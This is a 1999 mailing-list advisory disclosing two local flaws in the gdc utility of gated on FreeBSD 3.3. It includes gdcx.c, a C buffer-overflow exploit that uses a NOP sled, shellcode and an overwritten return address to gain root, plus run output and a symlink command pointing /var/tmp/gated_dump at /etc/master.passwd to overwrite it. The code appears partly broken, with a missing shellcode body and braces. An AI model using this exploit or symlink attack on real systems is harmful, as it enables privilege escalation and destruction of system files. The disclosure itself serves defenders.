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FreeBSD 3.3 gated-3.1.5 local exploit

From: btellier () USA NET (Brock Tellier)
Date: Tue, 30 Nov 1999 15:31:06 MST


Vulnerabilities exist in gdc in (at least) FreeBSD 3.3-RELEASE which will
allow certian users to gain root privs and overwrite system files.

My tests were done ONLY on FreeBSD 3.3-RELEASE with the gated-3.5.11 
included on the installation CD.  By default on FreeBSD (when installed
at initial install by /stand/sysinstall), gdc is given permissions as
-rwsr-x---  1 root  wheel  23832 Sep 10 23:21 /usr/local/bin/gdc
Thus only users in the group 'wheel' may run gdc.  


  Vuln #1

/usr/local/bin/gdc contains a buffer overflow that may ONLY be exploited 
by the group 'wheel'.  According to the man page the default group is
"gdmaint", but it was not installed this way by default on my system, nor
were any instructions given to make a gdmaint group.  The overflow comes
when gdc is supplied a large -t time option on the command line.  Some may
scoff at this particular hole, claiming that if you've let a malicious
user have/gain wheel privs, things have already gone past the point of no 
return. These people are probably right, but in any case, it's worth

  Vuln #2

/usr/local/bin/gdc allows debugging output to be written to a file in 
/var/tmp which follows symlinks.  This vulnerability can be exploited
to overwrite root-owned system files (more of a DoS, since it doesn't
change the destination file's perms) regardless of the user who ran gdc.
Once again, a normal user without wheel or similar gid cannot run gdc.
However a normal user may create the symlinks that a wheel group user's
gdc will follow.

buffer overflow as part of the wheel group:
$ gcc -o gdcx gdcx.c
$ ls -la `which gdc`
-rwsr-x---  1 root  wheel  23832 Sep 10 23:21 /usr/local/bin/gdc
$ id
uid=1000(xnec) gid=1000(xnec) groups=1000(xnec), 0(wheel)
$ ./gdcx
gdc exploit for FreeBSD 3.3-RELEASE <btellier () usa net>
eip=0xbfbfdb65 offset=0 buflen=4093
NOPs to 937
Shellcode to 1004
eip to 1008
gdc: invalid wait time:
3ÒR‰V‰V F
P P¸{V4 5@V4 Qš>:)(:<èÆÿÿÿ/bin/sheÛ¿¿

---- gdcx.c ----
 * gdc exploit for Freebsd-3.3 yields euid=0(root)
 * by default, only group wheel (or whatever your trusted gated group is)
 * and root can run gdc
 * Brock Tellier btellier () usa net

#include <stdio.h>

char shell[]= /* mudge () l0pht com */

main (int argc, char *argv[] ) {
 int x = 0;
 int y = 0;
 int offset = 0;
 int bsize = 4093;
 char buf[bsize];
 int eip = 0xbfbfdb65; /* works for me */

 if (argv[1]) { 
   offset = atoi(argv[1]);
   eip = eip + offset;
 fprintf(stderr, "gdc exploit for FreeBSD 3.3-RELEASE <btellier () usa net>\n");
 fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize);
 for ( x = 0; x < 937; x++) buf[x] = 0x90;
     fprintf(stderr, "NOPs to %d\n", x);
 for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y];
     fprintf(stderr, "Shellcode to %d\n",x);
  buf[x++] =  eip & 0x000000ff;
  buf[x++] = (eip & 0x0000ff00) >> 8;
  buf[x++] = (eip & 0x00ff0000) >> 16;
  buf[x++] = (eip & 0xff000000) >> 24;
     fprintf(stderr, "eip to %d\n",x);

 buf[bsize - 1]='\0';

 execl("/usr/local/bin/gdc", "gdc", "-t", buf, NULL);


for symlink vulnerability:

ln -s /etc/master.passwd /var/tmp/gated_dump
(wait for priv'd user to run /usr/local/bin/gdc dump)

Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA

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